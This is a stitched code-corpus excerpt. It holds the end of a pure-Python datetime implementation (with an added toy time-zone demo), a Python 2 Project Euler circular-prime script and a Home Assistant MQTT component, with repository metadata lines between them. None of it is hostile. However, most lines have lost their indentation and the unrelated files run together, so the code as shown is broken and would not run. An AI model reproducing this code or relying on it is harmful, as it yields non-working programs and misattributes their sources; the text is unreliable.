"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
_check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return time(hour, minute, second, microsecond, tzinfo)
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
self._hour, self._minute, self._second, us1, us2, us3 = string
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints.
"""
__slots__ = date.__slots__ + time.__slots__
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
if isinstance(year, bytes) and len(year) == 10 and 1 <= year[2] <= 12:
# Pickle support
self = object.__new__(cls)
self.__setstate(year, month)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def _fromtimestamp(cls, t, utc, tz):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
frac, t = _math.modf(t)
us = round(frac * 1e6)
if us >= 1000000:
t += 1
us -= 1000000
elif us < 0:
t -= 1
us += 1000000
converter = _time.gmtime if utc else _time.localtime
y, m, d, hh, mm, ss, weekday, jday, dst = converter(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us, tz)
@classmethod
def fromtimestamp(cls, t, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
result = cls._fromtimestamp(t, tz is not None, tz)
if tz is not None:
result = tz.fromutc(result)
return result
@classmethod
def utcfromtimestamp(cls, t):
"""Construct a naive UTC datetime from a POSIX timestamp."""
return cls._fromtimestamp(t, True, None)
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self.dst()
if dst is None:
dst = -1
elif dst:
dst = 1
else:
dst = 0
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def timestamp(self):
"Return POSIX timestamp as float"
if self._tzinfo is None:
return _time.mktime((self.year, self.month, self.day,
self.hour, self.minute, self.second,
-1, -1, -1)) + self.microsecond / 1e6
else:
return (self - _EPOCH).total_seconds()
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
offset = self.utcoffset()
if offset:
self -= offset
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return datetime(year, month, day, hour, minute, second, microsecond,
tzinfo)
def astimezone(self, tz=None):
if tz is None:
if self.tzinfo is None:
raise ValueError("astimezone() requires an aware datetime")
ts = (self - _EPOCH) // timedelta(seconds=1)
localtm = _time.localtime(ts)
local = datetime(*localtm[:6])
try:
# Extract TZ data if available
gmtoff = localtm.tm_gmtoff
zone = localtm.tm_zone
except AttributeError:
# Compute UTC offset and compare with the value implied
# by tm_isdst. If the values match, use the zone name
# implied by tm_isdst.
delta = local - datetime(*_time.gmtime(ts)[:6])
dst = _time.daylight and localtm.tm_isdst > 0
gmtoff = -(_time.altzone if dst else _time.timezone)
if delta == timedelta(seconds=gmtoff):
tz = timezone(delta, _time.tzname[dst])
else:
tz = timezone(delta)
else:
tz = timezone(timedelta(seconds=gmtoff), zone)
elif not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = "%s.%s(%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
", ".join(map(str, L)))
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
@classmethod
def strptime(cls, date_string, format):
'string, format -> new datetime parsed from a string (like time.strptime()).'
import _strptime
return _strptime._strptime_datetime(cls, date_string, format)
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
_check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) == 0
elif not isinstance(other, date):
return NotImplemented
else:
return False
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
delta = timedelta(self.toordinal(),
hours=self._hour,
minutes=self._minute,
seconds=self._second,
microseconds=self._microsecond)
delta += other
hour, rem = divmod(delta.seconds, 3600)
minute, second = divmod(rem, 60)
if 0 < delta.days <= _MAXORDINAL:
return datetime.combine(date.fromordinal(delta.days),
time(hour, minute, second,
delta.microseconds,
tzinfo=self._tzinfo))
raise OverflowError("result out of range")
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self + -other
return NotImplemented
days1 = self.toordinal()
days2 = other.toordinal()
secs1 = self._second + self._minute * 60 + self._hour * 3600
secs2 = other._second + other._minute * 60 + other._hour * 3600
base = timedelta(days1 - days2,
secs1 - secs2,
self._microsecond - other._microsecond)
if self._tzinfo is other._tzinfo:
return base
myoff = self.utcoffset()
otoff = other.utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("cannot mix naive and timezone-aware time")
return base + otoff - myoff
def __hash__(self):
if self._hashcode == -1:
tzoff = self.utcoffset()
if tzoff is None:
self._hashcode = hash(self._getstate()[0])
else:
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + self.minute * 60 + self.second
self._hashcode = hash(timedelta(days, seconds, self.microsecond) - tzoff)
return self._hashcode
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = string
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
class timezone(tzinfo):
__slots__ = '_offset', '_name'
# Sentinel value to disallow None
_Omitted = object()
def __new__(cls, offset, name=_Omitted):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
if name is cls._Omitted:
if not offset:
return cls.utc
name = None
elif not isinstance(name, str):
raise TypeError("name must be a string")
if not cls._minoffset <= offset <= cls._maxoffset:
raise ValueError("offset must be a timedelta "
"strictly between -timedelta(hours=24) and "
"timedelta(hours=24).")
if (offset.microseconds != 0 or offset.seconds % 60 != 0):
raise ValueError("offset must be a timedelta "
"representing a whole number of minutes")
return cls._create(offset, name)
@classmethod
def _create(cls, offset, name=None):
self = tzinfo.__new__(cls)
self._offset = offset
self._name = name
return self
def __getinitargs__(self):
"""pickle support"""
if self._name is None:
return (self._offset,)
return (self._offset, self._name)
def __eq__(self, other):
if type(other) != timezone:
return False
return self._offset == other._offset
def __hash__(self):
return hash(self._offset)
def __repr__(self):
"""Convert to formal string, for repr().
>>> tz = timezone.utc
>>> repr(tz)
'datetime.timezone.utc'
>>> tz = timezone(timedelta(hours=-5), 'EST')
>>> repr(tz)
"datetime.timezone(datetime.timedelta(-1, 68400), 'EST')"
"""
if self is self.utc:
return 'datetime.timezone.utc'
if self._name is None:
return "%s.%s(%r)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._offset)
return "%s.%s(%r, %r)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._offset, self._name)
def __str__(self):
return self.tzname(None)
def utcoffset(self, dt):
if isinstance(dt, datetime) or dt is None:
return self._offset
raise TypeError("utcoffset() argument must be a datetime instance"
" or None")
def tzname(self, dt):
if isinstance(dt, datetime) or dt is None:
if self._name is None:
return self._name_from_offset(self._offset)
return self._name
raise TypeError("tzname() argument must be a datetime instance"
" or None")
def dst(self, dt):
if isinstance(dt, datetime) or dt is None:
return None
raise TypeError("dst() argument must be a datetime instance"
" or None")
def fromutc(self, dt):
if isinstance(dt, datetime):
if dt.tzinfo is not self:
raise ValueError("fromutc: dt.tzinfo "
"is not self")
return dt + self._offset
raise TypeError("fromutc() argument must be a datetime instance"
" or None")
_maxoffset = timedelta(hours=23, minutes=59)
_minoffset = -_maxoffset
@staticmethod
def _name_from_offset(delta):
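        # Render a fixed offset as 'UTC+HH:MM' or 'UTC-HH:MM'.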
if delta < timedelta(0):
sign = '-'
delta = -delta
else:
sign = '+'
hours, rest = divmod(delta, timedelta(hours=1))
minutes = rest // timedelta(minutes=1)
return 'UTC{}{:02d}:{:02d}'.format(sign, hours, minutes)
timezone.utc = timezone._create(timedelta(0))
timezone.min = timezone._create(timezone._minoffset)
timezone.max = timezone._create(timezone._maxoffset)
_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Some time zone algebra. For a datetime x, let
# x.n = x stripped of its timezone -- its naive time.
# x.o = x.utcoffset(), and assuming that doesn't raise an exception or
# return None
# x.d = x.dst(), and assuming that doesn't raise an exception or
# return None
# x.s = x's standard offset, x.o - x.d
#
# Now some derived rules, where k is a duration (timedelta).
#
# 1. x.o = x.s + x.d
# This follows from the definition of x.s.
#
# 2. If x and y have the same tzinfo member, x.s = y.s.
# This is actually a requirement, an assumption we need to make about
# sane tzinfo classes.
#
# 3. The naive UTC time corresponding to x is x.n - x.o.
# This is again a requirement for a sane tzinfo class.
#
# 4. (x+k).s = x.s
#    This follows from #2, and that datetime+timedelta preserves tzinfo.
#
# 5. (x+k).n = x.n + k
# Again follows from how arithmetic is defined.
#
# Now we can explain tz.fromutc(x). Let's assume it's an interesting case
# (meaning that the various tzinfo methods exist, and don't blow up or return
# None when called).
#
# The function wants to return a datetime y with timezone tz, equivalent to x.
# x is already in UTC.
#
# By #3, we want
#
# y.n - y.o = x.n [1]
#
# The algorithm starts by attaching tz to x.n, and calling that y. So
# x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
# becomes true; in effect, we want to solve [2] for k:
#
# (y+k).n - (y+k).o = x.n [2]
#
# By #1, this is the same as
#
# (y+k).n - ((y+k).s + (y+k).d) = x.n [3]
#
# By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
# Substituting that into [3],
#
# x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
# k - (y+k).s - (y+k).d = 0; rearranging,
# k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
# k = y.s - (y+k).d
#
# On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
# approximate k by ignoring the (y+k).d term at first. Note that k can't be
# very large, since all offset-returning methods return a duration of magnitude
# less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
# be 0, so ignoring it has no consequence then.
#
# In any case, the new value is
#
# z = y + y.s [4]
#
# It's helpful to step back and look at [4] from a higher level: it's simply
# mapping from UTC to tz's standard time.
#
# At this point, if
#
# z.n - z.o = x.n [5]
#
# we have an equivalent time, and are almost done. The insecurity here is
# at the start of daylight time. Picture US Eastern for concreteness. The wall
# time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
# sense then. The docs ask that an Eastern tzinfo class consider such a time to
# be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
# on the day DST starts. We want to return the 1:MM EST spelling because that's
# the only spelling that makes sense on the local wall clock.
#
# In fact, if [5] holds at this point, we do have the standard-time spelling,
# but that takes a bit of proof. We first prove a stronger result. What's the
# difference between the LHS and RHS of [5]? Let
#
# diff = x.n - (z.n - z.o) [6]
#
# Now
# z.n = by [4]
# (y + y.s).n = by #5
# y.n + y.s = since y.n = x.n
#     x.n + y.s =                 since z and y have the same tzinfo member,
# y.s = z.s by #2
# x.n + z.s
#
# Plugging that back into [6] gives
#
# diff =
# x.n - ((x.n + z.s) - z.o) = expanding
# x.n - x.n - z.s + z.o = cancelling
# - z.s + z.o = by #2
# z.d
#
# So diff = z.d.
#
# If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
# spelling we wanted in the endcase described above. We're done. Contrarily,
# if z.d = 0, then we have a UTC equivalent, and are also done.
#
# If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
# add to z (in effect, z is in tz's standard time, and we need to shift the
# local clock into tz's daylight time).
#
# Let
#
# z' = z + z.d = z + diff [7]
#
# and we can again ask whether
#
# z'.n - z'.o = x.n [8]
#
# If so, we're done. If not, the tzinfo class is insane, according to the
# assumptions we've made. This also requires a bit of proof. As before, let's
# compute the difference between the LHS and RHS of [8] (and skipping some of
# the justifications for the kinds of substitutions we've done several times
# already):
#
# diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
# x.n - (z.n + diff - z'.o) = replacing diff via [6]
# x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
# x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
# - z.n + z.n - z.o + z'.o = cancel z.n
# - z.o + z'.o = #1 twice
# -z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
# z'.d - z.d
#
# So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
# we've found the UTC-equivalent so are done. In fact, we stop with [7] and
# return z', not bothering to compute z'.d.
#
# How could z.d and z'.d differ?  z' = z + z.d [7], so merely moving z' by
# a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
# would have to change the result dst() returns: we start in DST, and moving
# a little further into it takes us out of DST.
#
# There isn't a sane case where this can happen. The closest it gets is at
# the end of DST, where there's an hour in UTC with no spelling in a hybrid
# tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
# that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
# UTC) because the docs insist on that, but 0:MM is taken as being in daylight
# time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
# clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
# standard time. Since that's what the local clock *does*, we want to map both
# UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
# in local time, but so it goes -- it's the way the local clock works.
#
# When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
# so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
# z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
# (correctly) concludes that z' is not UTC-equivalent to x.
#
# Because we know z.d said z was in daylight time (else [5] would have held and
# we would have stopped then), and we know z.d != z'.d (else [8] would have held
# and we have stopped then), and there are only 2 possible values dst() can
# return in Eastern, it follows that z'.d must be 0 (which it is in the example,
# but the reasoning doesn't depend on the example -- it depends on there being
# two possible dst() outcomes, one zero and the other non-zero). Therefore
# z' must be in standard time, and is the spelling we want in this case.
#
# Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
# concerned (because it takes z' as being in standard time rather than the
# daylight time we intend here), but returning it gives the real-life "local
# clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
# tz.
#
# When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
# the 1:MM standard time spelling we want.
#
# So how can this break? One of the assumptions must be violated. Two
# possibilities:
#
# 1) [2] effectively says that y.s is invariant across all y belonging to a given
# time zone. This isn't true if, for political reasons or continental drift,
# a region decides to change its base offset from UTC.
#
# 2) There may be versions of "double daylight" time where the tail end of
# the analysis gives up a step too early. I haven't thought about that
# enough to say.
#
# In any case, it's clear that the default fromutc() is strong enough to handle
# "almost all" time zones: so long as the standard offset is invariant, it
# doesn't matter if daylight time transition points change from year to year, or
# if daylight time is skipped in some years; it doesn't matter how large or
# small dst() may get within its bounds; and it doesn't even matter if some
# perverse time zone returns a negative dst().  So a breaking case must be
# pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
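# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the stdlib module): a deliberately crude
# hybrid tzinfo is defined below.  Its month-based DST rule (April..October)
# is an assumption made only for this demo -- it is not the real US Eastern
# rule -- but it is enough to show the behavior argued for above: the default
# fromutc() maps both the "unspellable" UTC hour and the hour after it onto
# the same repeated local wall-clock hour at the end of DST.
class _EasternLike(tzinfo):
    """Toy Eastern-like zone used only to illustrate the default fromutc()."""
    def utcoffset(self, dt):
        return timedelta(hours=-5) + self.dst(dt)
    def dst(self, dt):
        if dt is None:
            return timedelta(0)
        return timedelta(hours=1) if 4 <= dt.month <= 10 else timedelta(0)
    def tzname(self, dt):
        return "EDT" if self.dst(dt) else "EST"
if __name__ == "__main__":
    _tz = _EasternLike()
    # Under the toy rule the fall-back transition sits at the October ->
    # November boundary, so both UTC readings below print the same repeated
    # local hour: 2010-11-01 00:30:00-05:00.
    for _hour in (4, 5):
        print(_tz.fromutc(datetime(2010, 11, 1, _hour, 30, tzinfo=_tz)))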
try:
from _datetime import *
except ImportError:
pass
else:
# Clean up unused names
del (_DAYNAMES, _DAYS_BEFORE_MONTH, _DAYS_IN_MONTH, _DI100Y, _DI400Y,
_DI4Y, _EPOCH, _MAXORDINAL, _MONTHNAMES, _build_struct_time,
_check_date_fields, _check_int_field, _check_time_fields,
_check_tzinfo_arg, _check_tzname, _check_utc_offset, _cmp, _cmperror,
_date_class, _days_before_month, _days_before_year, _days_in_month,
_format_time, _is_leap, _isoweek1monday, _math, _ord2ymd,
_time, _time_class, _tzinfo_class, _wrap_strftime, _ymd2ord)
# XXX Since import * above excludes names that start with _,
# docstring does not get overwritten. In the future, it may be
# appropriate to maintain a single module level docstring and
# remove the following line.
from _datetime import __doc__
|
bgris/ODL_bgris
|
lib/python3.5/datetime.py
|
Python
|
gpl-3.0
| 75,899 | 0.000751 |
from math import sqrt
def is_prime(x):
for i in xrange(2, int(sqrt(x) + 1)):
if x % i == 0:
return False
return True
def rotate(v):
res = []
u = str(v)
while True:
u = u[1:] + u[0]
w = int(u)
if w == v:
break
res.append(w)
return res
MILLION = 1000000
primes = filter(is_prime, range(2, MILLION))
s = set(primes)
ans = 0
for item in primes:
flag = True
print item
for y in rotate(item):
if y not in s:
flag = False
if flag:
ans += 1
print ans
|
neutronest/eulerproject-douby
|
e35/35.py
|
Python
|
mit
| 586 | 0.006826 |
"""
homeassistant.components.mqtt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MQTT component, using paho-mqtt.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/mqtt/
"""
import json
import logging
import os
import socket
import time
from homeassistant.exceptions import HomeAssistantError
import homeassistant.util as util
from homeassistant.helpers import validate_config
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
_LOGGER = logging.getLogger(__name__)
DOMAIN = "mqtt"
MQTT_CLIENT = None
DEFAULT_PORT = 1883
DEFAULT_KEEPALIVE = 60
DEFAULT_QOS = 0
SERVICE_PUBLISH = 'publish'
EVENT_MQTT_MESSAGE_RECEIVED = 'MQTT_MESSAGE_RECEIVED'
DEPENDENCIES = []
REQUIREMENTS = ['paho-mqtt==1.1', 'jsonpath-rw==1.4.0']
CONF_BROKER = 'broker'
CONF_PORT = 'port'
CONF_CLIENT_ID = 'client_id'
CONF_KEEPALIVE = 'keepalive'
CONF_USERNAME = 'username'
CONF_PASSWORD = 'password'
CONF_CERTIFICATE = 'certificate'
ATTR_TOPIC = 'topic'
ATTR_PAYLOAD = 'payload'
ATTR_QOS = 'qos'
MAX_RECONNECT_WAIT = 300 # seconds
def publish(hass, topic, payload, qos=None):
""" Send an MQTT message. """
data = {
ATTR_TOPIC: topic,
ATTR_PAYLOAD: payload,
}
if qos is not None:
data[ATTR_QOS] = qos
hass.services.call(DOMAIN, SERVICE_PUBLISH, data)
def subscribe(hass, topic, callback, qos=DEFAULT_QOS):
""" Subscribe to a topic. """
def mqtt_topic_subscriber(event):
""" Match subscribed MQTT topic. """
if _match_topic(topic, event.data[ATTR_TOPIC]):
callback(event.data[ATTR_TOPIC], event.data[ATTR_PAYLOAD],
event.data[ATTR_QOS])
hass.bus.listen(EVENT_MQTT_MESSAGE_RECEIVED, mqtt_topic_subscriber)
MQTT_CLIENT.subscribe(topic, qos)
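# Illustrative sketch (not part of the component): how another component might
# use the two helpers above.  The hass argument is assumed to be a running
# Home Assistant instance and the topic names are made up for the example.
def _example_usage(hass):
    """ Subscribe to a wildcard topic and publish a sample payload. """
    def print_sensor_update(topic, payload, qos):
        """ Callback signature expected by subscribe(). """
        _LOGGER.info("Received %s on %s (qos=%s)", payload, topic, qos)
    # '#' matches every topic level below 'home/sensors/'.
    subscribe(hass, 'home/sensors/#', print_sensor_update)
    # Fire-and-forget publish using the default QoS.
    publish(hass, 'home/sensors/livingroom/temperature', '21.5')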
def setup(hass, config):
""" Get the MQTT protocol service. """
if not validate_config(config, {DOMAIN: ['broker']}, _LOGGER):
return False
conf = config[DOMAIN]
broker = conf[CONF_BROKER]
port = util.convert(conf.get(CONF_PORT), int, DEFAULT_PORT)
client_id = util.convert(conf.get(CONF_CLIENT_ID), str)
keepalive = util.convert(conf.get(CONF_KEEPALIVE), int, DEFAULT_KEEPALIVE)
username = util.convert(conf.get(CONF_USERNAME), str)
password = util.convert(conf.get(CONF_PASSWORD), str)
certificate = util.convert(conf.get(CONF_CERTIFICATE), str)
# For cloudmqtt.com, secured connection, auto fill in certificate
if certificate is None and 19999 < port < 30000 and \
broker.endswith('.cloudmqtt.com'):
certificate = os.path.join(os.path.dirname(__file__),
'addtrustexternalcaroot.crt')
global MQTT_CLIENT
try:
MQTT_CLIENT = MQTT(hass, broker, port, client_id, keepalive, username,
password, certificate)
except socket.error:
_LOGGER.exception("Can't connect to the broker. "
"Please check your settings and the broker "
"itself.")
return False
def stop_mqtt(event):
""" Stop MQTT component. """
MQTT_CLIENT.stop()
def start_mqtt(event):
""" Launch MQTT component when Home Assistant starts up. """
MQTT_CLIENT.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_mqtt)
def publish_service(call):
""" Handle MQTT publish service calls. """
msg_topic = call.data.get(ATTR_TOPIC)
payload = call.data.get(ATTR_PAYLOAD)
qos = call.data.get(ATTR_QOS, DEFAULT_QOS)
if msg_topic is None or payload is None:
return
MQTT_CLIENT.publish(msg_topic, payload, qos)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_mqtt)
hass.services.register(DOMAIN, SERVICE_PUBLISH, publish_service)
return True
